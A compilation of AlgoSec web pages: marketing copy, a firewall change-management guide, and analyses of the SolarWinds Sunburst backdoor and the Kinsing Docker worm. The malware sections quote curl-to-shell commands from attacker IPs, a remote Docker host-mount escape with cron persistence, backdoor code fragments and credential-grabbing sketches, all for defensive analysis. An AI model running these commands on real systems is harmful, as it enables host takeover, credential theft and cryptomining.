

- Nationwide | AlgoSec
Explore AlgoSec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Nationwide is a financial services organization headquartered in Columbus, Ohio, USA. AlgoSec delivers an application-centric solution to meet the network security challenges of one of the top financial services firms in the US. To learn more, go to https://algosec.com/
- AlgoSec acquires Prevasio to disrupt the Agentless Cloud Security market
Organizations of all sizes can now protect their cloud-native applications easily and cost-effectively across containers and all other cloud assets. Ridgefield Park, NJ, December 6, 2022 – AlgoSec, a global cybersecurity leader in securing application connectivity, announced today that it has acquired Prevasio, a SaaS cloud-native application protection platform (CNAPP) that includes an agentless cloud security posture management (CSPM) platform, anti-malware scanning, vulnerability assessment, and dynamic analysis for containers. As applications rapidly migrate to the cloud, security teams are being flooded with alerts. These teams struggle to detect and prioritize risks through cloud providers' native security controls, especially in multi-cloud environments. Furthermore, security teams are hard-pressed to find solutions that meet their budgetary constraints. To answer this need, AlgoSec will offer the Prevasio solution at aggressive pricing to new customers, as well as to the 1,800 blue-chip enterprise organizations it currently serves, allowing them to reduce their cloud security costs. Prevasio's user-friendly, cost-effective SaaS solution is designed for hardening security posture across all cloud assets, including containers. The solution provides increased visibility into security issues and compliance gaps, enabling cloud operations and security teams to prioritize risks and comply with CIS benchmarks. Prevasio customers have successfully reduced administration time and achieved operational cost reductions, even across small teams, within days of operationalization.
Leveraging patented technology developed by SRI International, one of the world's largest research institutes and the developer of Siri and many other leading technologies, Prevasio's key capabilities include: analysis of all assets across AWS, Azure, and Google Cloud, offering a unified view in a single pane of glass; risk prioritized according to CIS benchmarks and HIPAA and PCI regulations; blazing-fast static and dynamic agentless vulnerability scanning of containers; assessment and detection of cybersecurity threats; and instantaneous connection to AWS, Azure, or Google Cloud accounts without installation or deployment. Furthermore, AlgoSec will incorporate SRI artificial intelligence (AI) capabilities into the Prevasio solution. "Applications are the lifeblood of organizations. As such, our customers have an urgent need to effectively secure the connectivity of those applications across cloud and hybrid estates to avoid unpleasant surprises. With Prevasio, organizations can now confidently secure their cloud-native applications to increase organizational agility and harden their security posture," said Yuval Baron, AlgoSec CEO. A free trial of the Prevasio solution is available. About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere. The AlgoSec platform enables the world's most complex organizations to gain visibility, reduce risk, achieve compliance at the application level and process changes with zero touch across the hybrid network. AlgoSec's patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture.
Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks. About Prevasio Prevasio, an AlgoSec company, helps organizations of all sizes protect their cloud-native applications across containers and all other cloud assets. Prevasio’s agentless cloud-native application protection platform (CNAPP) provides increased visibility into security and compliance gaps, enabling the cloud operations and security teams to prioritize risks and ensure compliance with internet security benchmarks. Acquired by AlgoSec in 2022, Prevasio combines cloud-native security with SRI International’s proprietary AI capabilities and AlgoSec’s expertise in securing 1,800 of the world’s most complex organizations.
- AlgoSec | Sunburst Backdoor: A Deeper Look Into The SolarWinds’ Supply Chain Malware
Cloud Security | Rony Moshkovich | Published 12/15/20
Update: The next two parts of the analysis are available here and here. As earlier reported by FireEye, the actors behind a global intrusion campaign have managed to trojanise SolarWinds Orion business software updates in order to distribute malware. The original FireEye write-up already provides a detailed description of this malware. Nevertheless, as the malicious update SolarWinds-Core-v2019.4.5220-Hotfix5.msp was still available for download for hours after FireEye's post, it makes sense to have another look into the details of its operation. The purpose of this write-up is to provide new information not covered in the original write-up; any overlaps with the original description provided by FireEye are unintentional. To start, the malicious component SolarWinds.Orion.Core.BusinessLayer.dll inside the MSP package is a non-obfuscated .NET assembly. It can easily be reconstructed with a .NET disassembler, such as ILSpy, and then fully reproduced in C# code using Microsoft Visual Studio. Once reproduced, it can be debugged to better understand how it works. In a nutshell, the malicious DLL is a backdoor. It is loaded into the address space of the legitimate SolarWinds Orion process SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe. The critical strings inside the backdoor's class SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer are encoded with the DeflateStream class of .NET's System.IO.Compression library, coupled with the standard base64 encoder.
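DeflateStream emits a raw (headerless) DEFLATE stream, which maps onto Python's zlib module with wbits=-15. A minimal sketch of the equivalent encode/decode round trip (the helper names are ours, not the malware's):

```python
import base64
import zlib


def encode_string(text: str) -> str:
    # Raw DEFLATE (wbits=-15 means "no zlib header", matching .NET's
    # DeflateStream output), then standard base64.
    co = zlib.compressobj(wbits=-15)
    data = co.compress(text.encode()) + co.flush()
    return base64.b64encode(data).decode()


def decode_string(blob: str) -> str:
    # Reverse order: base64-decode, then raw-DEFLATE-decompress.
    return zlib.decompress(base64.b64decode(blob), wbits=-15).decode()
```

A disassembled sample's string table can be recovered by running each literal through a decoder like this one.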
Initialisation Once loaded, the malware checks whether its assembly file was created earlier than 12, 13, or 14 days ago; the exact number of hours it checks is a random number from 288 to 336. Next, it reads the application settings value ReportWatcherRetry . This value keeps the reporting status and may be set to one of these states: New (4), Truncate (3), or Append (5). When the malware runs for the first time, its reporting status variable ReportWatcherRetry is set to New (4) . The reporting status is an internal state that drives the logic. For example, if the reporting status is set to Truncate , the malware will stop operating by first disabling its networking communications, and then disabling other security tools and antivirus products. In order to stay silent, the malware periodically falls asleep for a random period of time that varies between 30 minutes and 2 hours. At the start, the malware obtains the computer's domain name . If the domain name is empty, the malware quits. It then generates an 8-byte User ID, derived from the system footprint. In particular, it is generated from the MD5 hash of a string that consists of three fields: the physical (MAC) address of the first or default operational (able to transmit data packets) network interface; the computer's domain name; and the UUID created by Windows during installation (the machine's unique ID). Even though it looks random, the User ID stays constant as long as the networking configuration and the Windows installation stay the same. Domain Generation Algorithm The malware relies on its own CryptoHelper class to generate a domain name. This class is instantiated from the 8-byte User ID and the computer's domain name, encoded with the substitution table "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj" . For example, if the original domain name is "domain", its encoded form will look like "n2huov". To generate a new domain, the malware first attempts to resolve the domain name "api.solarwinds.com". If it fails to resolve it, it quits.
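The published pair ("domain" becomes "n2huov") is consistent with each character being replaced by the character four positions further along the substitution table, wrapping at the end. A sketch under that assumption (how the sample handles characters absent from the table is not shown here, so pass-through is our guess):

```python
SUBST = "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj"


def encode_domain(name: str) -> str:
    # Replace each in-table character with the one 4 positions further
    # along (mod table length); pass everything else through unchanged.
    out = []
    for ch in name.lower():
        if ch in SUBST:
            out.append(SUBST[(SUBST.index(ch) + 4) % len(SUBST)])
        else:
            out.append(ch)  # assumption: the real sample escapes these
    return "".join(out)
```

With this table, encode_domain("domain") reproduces the article's "n2huov" example.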
The first part of the newly generated domain name is a random string, produced from the 8-byte User ID and a random seed value, and encoded with the custom base64 alphabet "ph2eifo3n5utg1j8d94qrvbmk0sal76c" . Because it is generated from a random seed value, the first part of the newly generated domain name is random. For example, it may look like "fivu4vjamve5vfrt" or "k1sdhtslulgqoagy". To produce the full domain name, this string is appended with the earlier encoded domain name (such as "n2huov") and a random suffix selected from the following list: .appsync-api.eu-west-1[.]avsvmcloud[.]com .appsync-api.us-west-2[.]avsvmcloud[.]com .appsync-api.us-east-1[.]avsvmcloud[.]com .appsync-api.us-east-2[.]avsvmcloud[.]com For example, the final domain name may look like: fivu4vjamve5vfrtn2huov[.]appsync-api.us-west-2[.]avsvmcloud[.]com or k1sdhtslulgqoagyn2huov[.]appsync-api.us-east-1[.]avsvmcloud[.]com Next, the domain name is resolved to an IP address, or to a list of IP addresses. For example, it may resolve to 20.140.0.1 . The resolved domain name is returned in an IPAddress structure that contains an AddressFamily field, a special field that specifies the addressing scheme. If the host name returned in the IPAddress structure is different from the queried domain name, the returned host name will be used as a C2 host name for the backdoor.
Otherwise, the malware will check if the resolved IP address matches one of the patterns below, in order to return an 'address family':

IP Address | Subnet Mask | 'Address Family'
10.0.0.0 | 255.0.0.0 | Atm
172.16.0.0 | 255.240.0.0 | Atm
192.168.0.0 | 255.255.0.0 | Atm
224.0.0.0 | 240.0.0.0 | Atm
fc00:: | fe00:: | Atm
fec0:: | ffc0:: | Atm
ff00:: | ff00:: | Atm
41.84.159.0 | 255.255.255.0 | Ipx
74.114.24.0 | 255.255.248.0 | Ipx
154.118.140.0 | 255.255.255.0 | Ipx
217.163.7.0 | 255.255.255.0 | Ipx
20.140.0.0 | 255.254.0.0 | ImpLink
96.31.172.0 | 255.255.255.0 | ImpLink
131.228.12.0 | 255.255.252.0 | ImpLink
144.86.226.0 | 255.255.255.0 | ImpLink
8.18.144.0 | 255.255.254.0 | NetBios
18.130.0.0 | 255.255.0.0 | NetBios
71.152.53.0 | 255.255.255.0 | NetBios
99.79.0.0 | 255.255.0.0 | NetBios
87.238.80.0 | 255.255.248.0 | NetBios
199.201.117.0 | 255.255.255.0 | NetBios
184.72.0.0 | 255.254.0.0 | NetBios

For example, if the queried domain resolves to 20.140.0.1 , it will match the table entry 20.140.0.0 , for which the returned 'address family' is ImpLink . The returned 'address family' invokes additional logic in the malware. Disabling Security Tools and Antivirus Products If the returned 'address family' is ImpLink or Atm , the malware will enumerate all processes and, for each process, check whether its name matches one of the pre-defined hashes. Next, it repeats this process for the services and the drivers installed in the system. If a process name or the full path of an installed driver matches one of the pre-defined hashes, the malware will disable it. For hashing, the malware relies on the Fowler–Noll–Vo algorithm. For example, the core process of Windows Defender is MsMpEng.exe . The hash value of the "MsMpEng" string is 5183687599225757871 . This value is enlisted in the malware's source under the variable name timeStamps : timeStamps = new ulong[1] { 5183687599225757871uL } The service name of Windows Defender is windefend ; the hash of this string ( 917638920165491138 ) is also present in the malware body.
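For reference, plain 64-bit FNV-1a is only a few lines. Note that, per FireEye's analysis, the sample XORs the FNV-1a result with an additional constant before comparing it against its hash list, so this unmodified version will not reproduce the values quoted above directly:

```python
FNV_OFFSET = 0xCBF29CE484222325  # standard 64-bit FNV offset basis
FNV_PRIME = 0x100000001B3        # standard 64-bit FNV prime


def fnv1a64(data: bytes) -> int:
    # Classic FNV-1a: XOR each byte in, then multiply by the prime,
    # truncating to 64 bits at each step.
    h = FNV_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV_PRIME) & 0xFFFFFFFFFFFFFFFF
    return h
```

Hash-based name matching like this lets the malware avoid carrying a plaintext blocklist of security products in its binary.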
As a result, the malicious DLL will attempt to stop the Windows Defender service. In order to disable various security tools and antivirus products, the malware first grants itself the SeRestorePrivilege and SeTakeOwnershipPrivilege privileges, using the native AdjustTokenPrivileges() API. With these privileges enabled, the malware takes ownership of the service registry keys it intends to manipulate. It first attempts to explicitly set the new owner of the keys to the Administrator account. If such an account is not present, the malware enumerates all user accounts, looking for a SID that represents the administrator account. The malware uses the Windows Management Instrumentation query "Select * From Win32_UserAccount" to obtain the list of all users. For each enumerated user, it makes sure the account is local and then, once it obtains the account's SID, it makes sure the SID begins with S-1-5- and ends with -500 in order to locate the local administrator account. Once such an account is found, it is used as the new owner for the registry keys responsible for the services of the various security tools and antivirus products. With the new ownership set, the malware then disables these services by setting their Start value to 4 (Disabled): registryKey2.SetValue("Start", 4, RegistryValueKind.DWord); HTTP Backdoor If the returned 'address family' for the resolved domain name is NetBios , as specified in the lookup table above, the malware will initialise its HttpHelper class, which implements an HTTP backdoor. The backdoor commands are covered in the FireEye write-up, so let's check only a couple of commands to see what output they produce. One of the backdoor commands is CollectSystemDescription . As its name suggests, it collects system information. By running the code reconstructed from the malware, here is an actual example of the data collected by the backdoor and delivered to the attacker's C2 with a separate backdoor command UploadSystemDescription : 1.
%DOMAIN_NAME%
2. S-1-5-21-298510922-2159258926-905146427
3. DESKTOP-VL39FPO
4. UserName
5. [E] Microsoft Windows NT 6.2.9200.0 6.2.9200.0 64
6. C:\WINDOWS\system32
7. 0
8. %PROXY_SERVER%
Description: Killer Wireless-n/a/ac 1535 Wireless Network Adapter #2
MACAddress: 9C:B6:D0:F6:FF:5D
DHCPEnabled: True
DHCPServer: 192.168.20.1
DNSHostName: DESKTOP-VL39FPO
DNSDomainSuffixSearchOrder: Home
DNSServerSearchOrder: 8.8.8.8, 192.168.20.1
IPAddress: 192.168.20.30, fe80::8412:d7a8:57b9:5886
IPSubnet: 255.255.255.0, 64
DefaultIPGateway: 192.168.20.1, fe80::1af1:45ff:feec:a8eb
NOTE: Field #7 specifies the number of days (0) since the last system reboot. The GetProcessByDescription command builds a list of the processes running on a system. This command accepts an optional argument, which is one of a set of custom process properties. If the optional argument is not specified, the backdoor builds a process list that looks like:
[ 1720] svchost
[ 8184] chrome
[ 4732] svchost
If the optional argument is specified, the backdoor builds a process list that includes the specified process property in addition to the parent process ID, username, and domain of the process owner. For example, if the optional argument is "ExecutablePath", the GetProcessByDescription command may return a list similar to:
[ 3656] sihost.exe C:\WINDOWS\system32\sihost.exe 1720 DESKTOP-VL39FPO\UserName
[ 3824] svchost.exe C:\WINDOWS\system32\svchost.exe 992 DESKTOP-VL39FPO\UserName
[ 9428] chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 4600 DESKTOP-VL39FPO\UserName
Other backdoor commands enable deployment of the 2nd-stage malware.
For example, the WriteFile command saves a file:
using (FileStream fileStream = new FileStream(path, FileMode.Append, FileAccess.Write))
{
    fileStream.Write(array, 0, array.Length);
}
The downloaded 2nd-stage malware can then be executed with the RunTask command:
using (Process process = new Process())
{
    process.StartInfo = new ProcessStartInfo(fileName, arguments)
    {
        CreateNoWindow = false,
        UseShellExecute = false
    };
    if (process.Start())
    …
Alternatively, it can be configured to be executed on system restart, using registry manipulation commands such as SetRegistryValue .
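One detail from the service-disabling step above deserves a concrete illustration: the malware locates the built-in local administrator purely by the shape of the account SID (prefix S-1-5-, final component, the RID, equal to 500). A minimal sketch of that check (the function name is ours):

```python
import re

# Built-in local administrator accounts have SIDs of the form
# S-1-5-21-<domain part>-500: the RID 500 is fixed even if the
# account has been renamed.
_ADMIN_SID = re.compile(r"^S-1-5-.+-500$")


def is_builtin_admin(sid: str) -> bool:
    return _ADMIN_SID.match(sid) is not None
```

Matching on the well-known RID rather than the account name is why renaming "Administrator" does not hide the account from this kind of lookup.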
- AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers
Cloud Security | Rony Moshkovich | Published 8/22/20
We all remember how, a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on the Windows Task Scheduler to activate remote payloads. Today, it's déjà vu all over again, only in the world of Linux. As reported earlier this week by Cado Security, a new fork of the Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and take a closer look at its modus operandi. As it turns out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let's start with its simplest trick: the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with the Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using the AWS CLI programmatically. There is one little caveat, though.
The AWS CLI stores your credentials in a clear-text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means your cloud infrastructure is now only as secure as your local computer. It was only a matter of time before the bad guys noticed such low-hanging fruit and used it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers compromised this server, installed the webshell b374k , and then uploaded several malicious files to it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host.
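Since ~/.aws/credentials is just an INI file, reading it takes a few lines of standard-library Python, which is essentially all a grabber needs. A sketch (the function name is ours, and the key values below are placeholders):

```python
import configparser
from pathlib import Path


def read_aws_credentials(home: Path) -> dict:
    # ~/.aws/credentials is plain INI text: any code that can read the
    # user's home directory can lift every profile's keys.
    creds = configparser.ConfigParser()
    creds.read(home / ".aws" / "credentials")
    return {section: dict(creds[section]) for section in creds.sections()}
```

The same reasoning explains why the worm simply loops over every home directory on the host: no decryption step is required.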
According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun up with the following parameters:
./nigix --tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x --currency monero --httpd 8080
A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of the alpine container image:
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh'
Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection to other Docker hosts. To understand the mechanism behind it, it's important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring the Docker daemon to listen for remote connections is easy: all it requires is one extra entry -H tcp://127.0.0.1:2375 in the systemd unit file or the daemon.json file. Once configured and restarted, the daemon will expose port 2375 to remote clients:
$ sudo netstat -tulpn | grep dockerd
tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd
To attack other hosts, the malware collects network segments for all network interfaces with the help of the ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 .
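Deriving the segment to scan from an interface address is a single standard-library call; a sketch (the function name is ours):

```python
import ipaddress


def local_scan_range(ip_with_prefix: str) -> str:
    # "192.168.20.25/24" -> "192.168.20.0/24": the CIDR block that the
    # worm would hand to masscan for this interface's segment.
    return str(ipaddress.ip_interface(ip_with_prefix).network)
```

The worm gets the same information by parsing `ip route show` output rather than computing it itself, but the result is identical.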
For each collected network segment, it launches the masscan tool to probe each IP address in the segment on the following ports:
2375 (docker): Docker REST API (plain text)
2376 (docker-s): Docker REST API (SSL)
2377 (swarm): RPC interface for Docker Swarm
4243 (docker): old Docker REST API (plain text)
4244 (docker-basic-auth): authentication for the old Docker REST API
The scan rate is set to 50,000 packets/second. For example, running the masscan tool over the CIDR block 192.168.20.0/24 on port 2375 may produce output similar to:
$ masscan 192.168.20.0/24 -p2375 --rate=50000
Discovered open port 2375/tcp on 192.168.20.25
From the output above, the malware selects the word at the 6th position, which is the detected IP address. Next, the worm runs zgrab , a banner-grabber utility, to send an HTTP request for "/v1.16/version" to the selected endpoint; a local instance of the Docker daemon answers such a request with a JSON version banner. Next, it applies the grep utility to the contents returned by zgrab , making sure the returned JSON contains either the "ApiVersion" or the "client version 1.16" string. The latest version of the Docker daemon will have "ApiVersion" in its banner. Finally, it applies jq , a command-line JSON processor, to parse the JSON, extract the "ip" field, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses of hosts in the same network segments as the victim that run the Docker daemon.
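The word-at-6th-position extraction that the worm performs on masscan output can be sketched as:

```python
def parse_masscan_line(line: str):
    # "Discovered open port 2375/tcp on 192.168.20.25" -> "192.168.20.25"
    words = line.split()
    if len(words) >= 6 and words[0] == "Discovered":
        return words[5]  # the 6th whitespace-separated field
    return None
```

In the actual script this is done with shell tools (awk-style field selection) rather than Python, but the field arithmetic is the same.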
For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports and instruct it to download and run the specified malicious script:
docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; …"
The malicious script employed by the worm allows it to execute code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We'll get to this trick in a moment. For now, let's break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: the --rm switch causes Docker to automatically remove the container when it exits; -v /:/mnt is a bind-mount parameter that instructs the Docker runtime to mount the host's root directory / inside the container as /mnt ; chroot /mnt changes the root directory of the current running process to /mnt , which corresponds to the root directory / of the host; finally, a malicious script is downloaded and executed. Escaping From the Docker Container The malicious script downloaded and executed within the alpine container first checks whether the user's crontab (a special configuration file that specifies shell commands to run periodically on a given schedule) contains the string "129[.]211[.]98[.]236":
crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep
If it does not contain such a string, the script will set up a new cron job:
echo "setup cron"
( crontab -l 2>/dev/null
echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1" ) | crontab -
The snippet above suppresses the "no crontab for username" message and creates a new scheduled task to be executed every minute . The scheduled task consists of two parts: download and execute the malicious script, then delete all scheduled tasks from the crontab .
This effectively executes the scheduled task only once, with a one-minute delay. After that, the container image quits. There are two important points about this trick: because the Docker container's root directory (after the chroot ) was mapped to the host's root directory / , any task scheduled inside the container is automatically scheduled in the host's root crontab ; and because the Docker daemon runs as root, a remote non-root user following these steps creates a task scheduled in root's crontab , to be executed as root. Building PoC To test this trick in action, let's create a shell script that prints "123" into a file _123.txt located in the root directory / :
echo "setup cron"
( crontab -l 2>/dev/null
echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1" ) | crontab -
Next, let's pass this script, encoded in base64 format, to the Docker daemon running on the local host:
docker -H tcp://127.0.0.1:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"
Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers:
$ docker -H tcp://127.0.0.1:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
An important question now is whether the crontab job was created inside the (now destroyed) Docker container or on the host. Checking root's crontab on the host tells us that the task was scheduled for the host's root, to be run on the host:
$ sudo crontab -l
* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1
A minute later, the file _123.txt shows up in the host's root directory, and the scheduled entry disappears from root's crontab on the host:
$ sudo crontab -l
no crontab for root
This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host.
By using the cron-job trick, the malware manipulates the Docker daemon into executing malware directly on the host! Malicious Script Upon escaping from the container to execute directly on the remote compromised host, the malicious script performs its follow-up actions.
- Firewall rule automation & change management explained | AlgoSec
Learn about firewall rule automation and change management to streamline processes, reduce human error, and enhance network security with effective change controls. Firewall rule automation & change management explained Introduction In today's IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. For a variety of reasons – rapid business growth from mergers and acquisitions, development of new applications, de-commissioning of old applications, new users, evolving networks and evolving cyberthreats – business needs change and, as they do, so must security policies. But change comes with challenges, often leading to major headaches for IT operations and security teams. The headaches sometimes develop into huge business problems: manual workflows and change-management processes are time-consuming and prevent IT from keeping up with the agility the business needs, and improper management of even minor changes can lead to serious business risks, from blocking legitimate traffic all the way to taking the entire network offline. Some organizations have grown so wary of change control and its potential negative impact that they resort to network freezes during peak business times rather than attempt to implement an urgent change in their network security policies. AlgoSec has another point of view. We want to help you embrace change through process improvement, identifying areas where automation and actionable intelligence can simultaneously enhance security and business agility – without the headaches.
Here, you will learn how to elevate your firewall change management from manual, labor-intensive work to a fully automated change-management process. Why is it so hard to make changes to network policies? Placing a sticky note on your firewall administrator's desk and expecting the change request to be performed pronto does not constitute a formal policy. Yet, shockingly, this is common practice. A formal change-request process is in order. Such a process dictates clearly defined and documented steps for how a change request is to be handled, by whom, how it is addressed within a specified SLA, and more. Using IT ticketing systems Popular IT ticketing systems, like ServiceNow and Remedy, are a good place to manage your firewall change requests. However, these systems are built for tracking general requests and were never designed for handling complex requests such as opening a network flow from server A to server B or revising user groups. Informal change processes Having a policy state "this is what we must do" is a start, but without a formal set of steps for carrying out and enforcing that policy, you still have a long way to go in terms of smoothing out your change processes. In fact, the main challenges of managing network security devices include time-consuming manual processes, poor change-management processes, and error-prone processes. Firewall change management requires detailed and concise steps that everyone understands and follows. Exceptions must be approved and documented, continuously improving the process over time. Communication breakdown Network security and operations staff work in separate silos. Their goals, and even their languages, are different. Working in silos is a clear recipe for trouble.
It is a major contributor to out-of-band (unexpected) changes which are notorious for resulting in “out-of-service.” In many large companies, routine IT operational and administrative tasks may be handled by a team other than the one that handles security and risk-related tasks. Although both teams work toward the same goal – smooth operation of the digital side of the business – decisions and actions made by one team may lead to problems for the other. Sometimes, these situations are alleviated in a rush with the good intention of dealing with security issues “later.” But this crucial “later” never arrives and the network remains open to breaches. In fact, according to a large-scale survey of our own customers, out-of-process firewall changes resulted in system outages for a majority of them. In addition, our customers pointed out that out-of-process changes have caused them exposure to data breaches and costly audit failures. How will you know if it’s broken? It’s imperative to know what the business is up against from the perspective of threats and vulnerabilities. What’s often overlooked, however, is the no-less-devastating impact of poorly managed firewall changes. Without carefully analyzing how even the most minor firewall changes are going to impact the network environment, businesses can suffer dramatic problems. Without thoughtful analysis, they might not know: What does the change do to vital visibility across the network? Which applications and connections are broken by this change? Which new security vulnerabilities are introduced? How will performance be affected? 
A lot of money and effort is put into keeping the bad guys out, while forgetting that “we have seen the enemy and he is us.” Network complexity is a security killer Renowned security expert, Bruce Schneier, has stated, “Complexity is the worst enemy of security.” The sheer complexity of any given network can lead to a lot of mistakes, especially when it comes to multiple firewalls with complex rule sets. Simplifying the firewall environment and management processes is necessary for good management. Did you know? Up to 30 percent of implemented rule changes in large firewall infrastructures are unnecessary because the firewalls are already allowing the requested traffic! Under time pressure, firewall administrators often create more rules which turn out to be redundant given already-existing rules. This wastes valuable time and makes the firewalls even harder to manage. Schedule a Demo Mind the gap? Not if you want a good change management process The introduction of new things opens up security gaps. New hires, software patches, upgrades and network updates all increase risk exposure. The situation is further complicated in larger organizations which may have a mixed security estate comprising traditional, next-generation and virtualized firewalls from multiple vendors across clouds and on-premise data centers, all with hundreds of policies and thousands of rules. Who can keep track of it all? What about unexpected, quick-fixes that enable access to certain resources or capabilities? In many cases, a fix is made in a rush (after all, who wants a C-level exec breathing down their neck because he wants to access the network from his new tablet RIGHT NOW?) without sufficient consideration of whether that change is allowable under current security policies, or if it introduces new exposures. Sure, you can’t predict when users will make change requests, but you can certainly prepare the process for handling these requests whenever they arise. 
Bringing both IT operations and security teams together to prepare game plans for these situations – and for other ‘knowns’ such as network upgrades, change freezes, and audits – helps to minimize the risk of security gaps. What’s more, there are solutions that automate day-to-day firewall management tasks and link these changes and procedures so that they are recorded as part of the change management plan. In fact, automated technologies can help bridge the gap between change management processes and what’s really taking place. They enhance accuracy by removing people from the equation to a very large degree. For example, a sophisticated firewall- and topology-aware workflow system that is able to identify redundant and unneeded change requests can increase the productivity of the IT staff. IT operations and security groups are ultimately responsible for making sure that systems are functioning properly so that business goals are continuously met. However, these teams approach business continuity from different perspectives. The security department’s number one goal is to protect the business and its data, whereas the IT operations team is focused on keeping systems up and running. It is natural for these two teams to clash. However, oftentimes, IT operations and security teams align their perspectives because both have a crucial ownership stake. The business has to keep running AND it has to be secure. But this kind of alignment of interests is easier said than done. To achieve the alignment, organizations must re-examine current IT and security processes. Let’s have a look at some examples of what happens when alignment is not performed. Schedule a Demo Real-life examples of good changes gone bad Example 1 A classic lack of communication between the IT operations and security groups put XYZ Corporation at risk.
An IT department administrator, who was trying to be helpful, took the initiative to set up (on his own, with no security involvement or documentation) an FTP share for a user who needed to upload files in a hurry. By making this off-the-cuff change, the IT admin quickly addressed the client’s request and the files were uploaded. However, the FTP account lingered unsecured well beyond its effective “use by” date. By the next day, the security team noticed large spikes of inbound traffic to the server through this very FTP account. Hackers abound. The FTP site had been compromised and was being exploited to host pirated movies. Example 2 A core provider of e-commerce services to businesses in the U.S. suffered a horrible fate due to a simple, but poorly managed, firewall change. One day, all e-commerce transactions in and out of its network ceased and the entire business was taken offline for several hours. The costs were astronomical. What happened? An out-of-band (and untested) change to a core firewall broke the communication between the e-commerce application and the internet. Business activity ground to a halt. Executive management got involved and the responsible IT staff members were reprimanded. Hundreds of thousands of dollars later, the root cause of the outage was uncovered: IT staff, oblivious to the consequences, chose not to test their firewall changes, bypassing their “burdensome” ITIL-based change management procedures. Tips from your own peers Taken from The Big Collection of Firewall Management Tips Document, document, document … And when in doubt, document some more! “It is especially critical for people to document the rules they add or change so that other administrators know the purpose of each rule and whom to contact about it. Good documentation can make troubleshooting easy.
